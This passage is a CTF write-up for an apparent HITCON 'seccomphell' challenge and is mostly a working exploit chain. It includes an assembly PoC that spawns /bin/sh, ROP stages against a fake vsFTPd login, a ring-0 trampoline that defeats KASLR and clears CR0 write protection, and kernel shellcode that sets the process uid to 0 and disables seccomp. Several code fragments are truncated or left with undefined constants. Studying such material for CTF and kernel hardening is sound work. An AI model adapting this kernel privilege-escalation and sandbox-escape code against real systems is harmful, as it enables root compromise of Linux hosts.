    .int 0b00000001   // flags (int because of padding - only the low byte is actually used)
    //     |||||\/\____  .seg_32bit (D) (must be 1 for set_thread_area)
    //     ||||| \_____  .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
    //     ||||\_______  .read_exec_only (!R)
    //     |||\________  .limit_in_pages (G)
    //     ||\_________  .seg_not_present (!P)
    //     |\__________  .useable (AV)
    //     \___________  .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
//     base2 (base_addr[31:24]) == (ignored)
//     flags1                   == (ignored)
//     limit1 (limit[19:16])    == (ignored)
//     flags0                   == (mostly ignored, except for the type)
//     base1 (base_addr[23:16]) == (ignored)
//     base0 (base_addr[15:0])  == cs_offset[63:48]
//     limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
    // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
    // above the target descriptor).
    .int TARGET_ENTRY + 2 // entry_number
    .int 0xffff           // base_addr
    .int 0xffff           // limit
    .int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
    .quad shell_path
    .quad 0
endvar shell_argv

var module_message
    .byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
    movl $sizeof_\desc, %edx
    leaq \desc(%rip), %rsi
    movl $0x11, %edi
    check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.

fn _start
    // Open device
    xorl %edx, %edx
    movl $O_WRONLY, %esi
    leaq module_path(%rip), %rdi
    check_syscall_64 $SYS_open
    movl %eax, %r15d

    // "stac" in CPL3
    pushfq
    orq $(1 << 18), (%rsp)
    popfq

    // Update the LDT
    modify_ldt user_desc
    modify_ldt high_desc

    // Trigger the overwrite
    movl $sizeof_module_message, %edx
    leaq module_message(%rip), %rsi
    movl %r15d, %edi
    check_syscall_64 $SYS_write

    // Go to CPL 0
    far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
    lcall *(gate_target)

    // Get a shell
    leaq shell_path(%rip), %rdi
    leaq shell_argv(%rip), %rsi
    xorl %edx, %edx
    check_syscall_64 $SYS_execve
    movq $0, %rdi
    check_syscall_64 $SYS_exit

// vim:syntax=asm:

So let's rewrite this into a Python payload.
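
The magic numbers in the Python port are just the PoC's descriptors and far pointer packed into integers. The sketch below derives them with struct; the constant names follow the assembly PoC, nothing else is assumed.

```python
import struct

TARGET_ENTRY = 12
LDT_SELECTOR = 0b100   # table indicator: selector refers to the LDT
RPL_USER = 0b011
KERNEL_CS = 2 * 8      # __KERNEL_CS, lands in the gate's selector field

# selector = index << 3 | table indicator | requested privilege level
selector = (TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER

# m16:32 far pointer: 4-byte offset, then the 2-byte selector.
# The offset is a dummy because the real target comes from the call gate.
far_ptr = struct.pack("<IH", 0xDEAD8664, selector)

# struct user_desc: entry_number, base_addr, limit, flag bits
user_desc = struct.pack("<IIII", TARGET_ENTRY, KERNEL_CS, 0x1000, 0b00000001)
high_desc = struct.pack("<IIII", TARGET_ENTRY + 2, 0xFFFF, 0xFFFF, 0b00111000)
```

Here selector comes out as 0x67, so far_ptr matches the first six bytes of p64(0x67dead8664), and the two descriptors match the quadword pairs (0x100000000c, 0x100001000) and (0xFFFF0000000E, 0x380000FFFF) that the shellcode pushes in reverse order.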

Stage 4:

trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}
  syscall
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}
  syscall

  cmp rax, 0
  jl FAIL

  {shc.echo("[+] write to backdoor\n")}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilige escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}

  {shc.echo("[+] END\n")}
  int 3

  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

""") + trampolin)

Stage 5.1: call gate trampolin

the trampolin stays the same as in the one_byte writeup.

Stage 5.1:

TRAMPOLIN = 0xc00000


ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

""") + ring0

TRAMPOLIN_LEN = len(trampolin)
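
A small aside on the bit masks used in these templates. The sketch below names the flag bits involved and shows what Python substitutes for an expression like ~(1 << 16) inside an f-string; as_u64 and clear_wp are helper names made up for this example.

```python
CR0_WP = 1 << 16          # write-protect bit in CR0
EFLAGS_IF = 1 << 9        # interrupt enable flag
EFLAGS_AC = 1 << 18       # with AC set, SMAP lets ring 0 touch user pages
PTI_SWITCH_MASK = 0x1000  # CR3 bit that selects the user page table under PTI


def as_u64(value: int) -> int:
    """Two's-complement view of a Python integer as a 64-bit register."""
    return value & 0xFFFFFFFFFFFFFFFF


def clear_wp(cr0: int) -> int:
    """Model of: and r8, ~(1 << 16)."""
    return as_u64(cr0 & ~CR0_WP)
```

Python integers are unbounded, so f"{~CR0_WP}" renders as -65537 rather than a 64-bit hex mask. The assembler sign-extends that immediate, which gives the same result as as_u64(~CR0_WP) = 0xfffffffffffeffff.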

Sandbox (Seccomp)

Finally, let's try to write shellcode to disable seccomp.

Stage 5.2: ring 0 payload

For ring0 we need to make some adjustments. The privilege escalation stays the same as in our PoC, but we have to find some way to disable seccomp. We found this writeup about disabling seccomp, but it isn't helpful anymore, because newer versions of the x86 Linux kernel changed the way seccomp works. It does give us an important starting point though: current (task_struct).

Let's first look at the task_struct, which simply includes a struct called seccomp:


/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED   0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Note: SECCOMP_MODE_DISABLED is not a valid mode to set using prctl (see the kernel source code).


struct seccomp {
    int mode;
    atomic_t filter_count;
    struct seccomp_filter *filter;

So can we just manually set the mode to SECCOMP_MODE_DISABLED? ... No. I also tried overwriting other parts of the seccomp struct, but none of this worked either. OK, let's go deeper down the rabbit hole and look at seccomp_filter:


struct seccomp_filter {
    refcount_t refs;
    refcount_t users;
    bool log;
    bool wait_killable_recv;
    struct action_cache cache;
    struct seccomp_filter *prev;
    struct bpf_prog *prog;
    struct notification *notif;
    struct mutex notify_lock;
    wait_queue_head_t wqh;

No luck either; manually patching the instructions of the bpf_prog didn't work.

Note: I didn't try messing with the flags, e.g. to disable jited, so this might have worked.

So what now? ... Well, if we look at the seccomp_filter struct we see a member called prev. Interesting, let's look at the source code for adding seccomp filters:

Basically the seccomp filters form a linked list, where each new filter replaces the current root entry.

So let's first try to add a simple rule that allows everything.


void allow_all() {

    struct sock_filter seccomp_filter[] = {

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);

which basically creates a struct that looks like this:

00:0000 rdx rsp 0x7fffffffe750 ◂— 1
01:0008-018     0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010-010     0x7fffffffe760 ◂— 0x7fff000000000006

and add it by calling do_seccomp directly.
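
The fake filter is small enough to build by hand. The sketch below packs a single BPF "return ALLOW" instruction as a struct sock_filter and lays out a sock_fprog in front of it, assuming the 64-bit layout in which the 16-bit len field is padded to eight bytes; fake_prog is a name made up for this example.

```python
import struct

BPF_RET = 0x06
BPF_K = 0x00
SECCOMP_RET_ALLOW = 0x7FFF0000


def sock_filter(code: int, jt: int, jf: int, k: int) -> bytes:
    """struct sock_filter { u16 code; u8 jt; u8 jf; u32 k; }"""
    return struct.pack("<HBBI", code, jt, jf, k)


ALLOW_ALL = sock_filter(BPF_RET | BPF_K, 0, 0, SECCOMP_RET_ALLOW)


def fake_prog(prog_addr: int) -> bytes:
    """sock_fprog placed at prog_addr, followed directly by its one filter."""
    filter_addr = prog_addr + 0x10
    return struct.pack("<QQ", 1, filter_addr) + ALLOW_ALL
```

Read as one little-endian quadword, ALLOW_ALL is 0x7fff000000000006, the value seen in the stack dump above.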

This added our rule to the top of the linked list and incremented filter_count, but we still can't call new syscalls. According to the man pages, this is because every filter in the list is evaluated and a kill action such as SECCOMP_RET_KILL_PROCESS takes precedence over SECCOMP_RET_ALLOW.

But what we can do now is manually reduce seccomp.filter_count to 1 and unlink the previous seccomp_filter (seccomp.filter->prev = NULL), and with that we have successfully disabled seccomp.
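
Why unlinking works can be seen in a simplified model of how the kernel walks the filter list: every filter runs, and the most restrictive action wins. The sketch below is a simplification, assuming the comparison is done on the action bits as a signed 32-bit value and ignoring details such as the action cache; all names are illustrative.

```python
SECCOMP_RET_KILL_THREAD = 0x00000000
SECCOMP_RET_ALLOW = 0x7FFF0000
SECCOMP_RET_ACTION_FULL = 0xFFFF0000


class Filter:
    def __init__(self, decide, prev=None):
        self.decide = decide  # callable: syscall nr -> action
        self.prev = prev      # older filter in the list, or None


def action_only(ret: int) -> int:
    """Action bits as a signed 32-bit value; lower means more restrictive."""
    value = ret & SECCOMP_RET_ACTION_FULL
    return value - (1 << 32) if value & 0x80000000 else value


def run_filters(head, nr: int) -> int:
    ret = SECCOMP_RET_ALLOW
    f = head
    while f is not None:          # walk newest -> oldest
        cur = f.decide(nr)
        if action_only(cur) < action_only(ret):
            ret = cur
        f = f.prev
    return ret


WHITELIST = {0, 1, 2, 3, 9, 10, 41, 42, 154, 60, 231}
original = Filter(lambda nr: SECCOMP_RET_ALLOW if nr in WHITELIST
                  else SECCOMP_RET_KILL_THREAD)
allow_all = Filter(lambda nr: SECCOMP_RET_ALLOW, prev=original)
```

With both filters linked, run_filters(allow_all, 59) still returns the kill action for execve. After allow_all.prev = None, the same call returns SECCOMP_RET_ALLOW.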

Stage 5.2:

PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
 1, # size
 PAYLOAD+0x18, # args (ptr to rules)
 0x7fff000000000006, # rules (RETURN ALLOW)



# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0


# current struct offset from gs

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // and rdi, {~0xffffff}
  sub rdi, {KASLR_WRITE_TO +0x400000}
  and rdi, {~0xfffff}
  mov r15, rdi

  // add fake seccomp filter, allow all
  lea rax, [r15+{DO_SECCOMP}]
  xor rsi, rsi
  mov rdx, {PAYLOAD+0x8}
  call rax

  // privilege escalation
  // crpt_cred = prepare_creds();

  lea rax, [r15+{PREP_CRED}]
  call rax

  // crpt_cred.uid = 0;
  // crpt_cred.gid = 0;
  mov rdi, rax
  movq [rdi+8], 0

  // commit_creds(crpt_cred);
  lea rax, [r15+{COMMIT_CRED}]
  call rax


  // get current
  movq rax, qword ptr gs:[{CURRENT}]

  // current.seccomp.count = 1 (was 2, fake and init)
  mov dword ptr[rax+0xc6c], 1

  // get current.seccomp.seccomp_filter
  mov rax, qword ptr[rax+0xc70]
  // current.seccomp.filter->prev = NULL
  mov qword ptr[rax+0x90], 0

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  pushfq
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq
""")


Final stage: get flag

At this point everything should be straightforward. This version worked, but sadly it had a pretty bad success rate, probably because the calls into kernel functions re-enable interrupts, as mentioned in the one_byte writeup. Still, the exploit was good enough to get the flag.


Please get a full root shell

Actually, this wasn't the flag; we need to use our root shell to find it.

Using find / -name '*flag*' 2> /dev/null we find a flag generator, /root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag, which we can execute to get the flag.

while (out := rl().rstrip()) != b'[+] spawning shell':
  pass  # discard output until the shell marker shows up


linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', "find / -name '*flag*' 2> /dev/null")
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

Improving success rate

After the CTF concluded, I talked with others who solved the challenge and realized why my success rate was so bad: it was the calls. So, inspired by other people's solutions, I rewrote my shellcode to get a much better success rate.

For privilege escalation we manually edit the cred struct that is linked in current (normally there are cred and real_cred, but in this scenario they are the same), so we simply set the uid and gid of that one struct to 0 to become root.
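How a single store can cover both uid and gid can be seen with a small model of the struct. This is a sketch only: the CredPrefix layout below is an assumption about the first fields of struct cred in v6.9 and should be checked against the actual build (for example with pahole or gdb) before relying on any offset.

```python
import ctypes
import struct


class CredPrefix(ctypes.Structure):
    # Assumed leading fields of struct cred; not taken from the challenge kernel
    _fields_ = [
        ("usage", ctypes.c_int64),
        ("uid", ctypes.c_uint32),
        ("gid", ctypes.c_uint32),
        ("suid", ctypes.c_uint32),
        ("sgid", ctypes.c_uint32),
        ("euid", ctypes.c_uint32),
        ("egid", ctypes.c_uint32),
    ]


buf = bytearray(ctypes.sizeof(CredPrefix))
cred = CredPrefix.from_buffer(buf)
cred.uid = cred.gid = cred.euid = 1000

# Equivalent of a 64-bit store of 0 at the uid offset
struct.pack_into("<Q", buf, CredPrefix.uid.offset, 0)

print(CredPrefix.uid.offset, CredPrefix.gid.offset, cred.uid, cred.gid, cred.euid)
```

In this model uid and gid are adjacent 32-bit fields, so a qword store zeroes both while a dword store changes only uid; fields further in, such as euid, are not touched by either.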

Disabling seccomp is more interesting. In thread_info there is a field called syscall_work whose flags control, among other things, whether seccomp is run on syscall entry. So we need to clear that flag, and then we can execute all syscalls. But this only works for the current task: if we execve another binary, seccomp is enabled again.

So additionally we need to set seccomp->mode to SECCOMP_MODE_DISABLED.
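The two writes boil down to clearing one bit and storing one zero. The sketch below models them on plain integers and also shows how the Python-side mask ends up in the assembly text. The bit position of SYSCALL_WORK_SECCOMP is an assumption (first entry of the syscall_work_bit enum), and the initial syscall_work value and the 0x0 offset are made up for illustration.

```python
SYSCALL_WORK_SECCOMP = 1 << 0   # assumed: SYSCALL_WORK_BIT_SECCOMP == 0
SECCOMP_MODE_DISABLED = 0
MASK64 = 0xFFFFFFFFFFFFFFFF


def clear_flag(word: int, flag: int) -> int:
    """64-bit equivalent of `and qword ptr [mem], ~flag`."""
    return word & ~flag & MASK64


# hypothetical task state: seccomp bit plus one unrelated bit set
syscall_work = 0b101
syscall_work = clear_flag(syscall_work, SYSCALL_WORK_SECCOMP)
seccomp_mode = SECCOMP_MODE_DISABLED

# In an f-string, ~1 is rendered as -2; the assembler sign-extends that
# immediate, which gives the 64-bit mask 0xffff...fffe.
operand = f"and qword ptr [r15+0x0], {~SYSCALL_WORK_SECCOMP}"

print(bin(syscall_work), seccomp_mode, operand)
```

The same formatting trick is used for {~PTI_SWITCH_MASK} when switching cr3 to the kernel page table.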

Stage 5.2 (improved):


# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  // current.thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  pushfq
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq
""")



Flag: hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}


#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost' 
PORT =  int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000
"""


context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(x) < s else se(x, t, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, t, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)

vm = None
def get_target(**kw):
  global vm

  if args.REMOTE or args.TEST:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([BINARY] + ARGS, env=ENV, **kw)

  try:
    from vagd import Dogd, Qegd, Box # only load vagd if needed
  except ImportError:
    log.error("Failed to import vagd, either run locally using LOCAL or install it")
  if not vm:
    vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True)  # Docker
    # vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True)  # Qemu
  if vm.is_new:
    log.info("new vagd instance") # additional setup here
  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)

t = get_target()

# STAGE 1: ROP BACKDOOR                     #

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR

rop.rsi = PIVOT
# rop.rdx = 0x400

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

# STAGE 2: PIVOT ROP                        #

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000



chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot,
})

linfo("pivot len: 0x%x", len(chain))


# STAGE 5.2: RING 0 PAYLOAD                 #

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/


# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  // current.thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8
  // => %cs
  popq r9

  // Set IF in the new RFLAGS (like sti)
  pushfq
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq
""")


# STAGE 5.1: CALL GATE TRAMPOLIN            #

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000


RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

RING_0:

""") + ring0

TRAMPOLIN_LEN = len(trampolin)


far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] write to backdoor\n")}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilege escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}
  jmp FAIL

FAIL:
  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

TRAMPOLIN:

""") + trampolin).ljust(0x500, asm('nop'))


PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
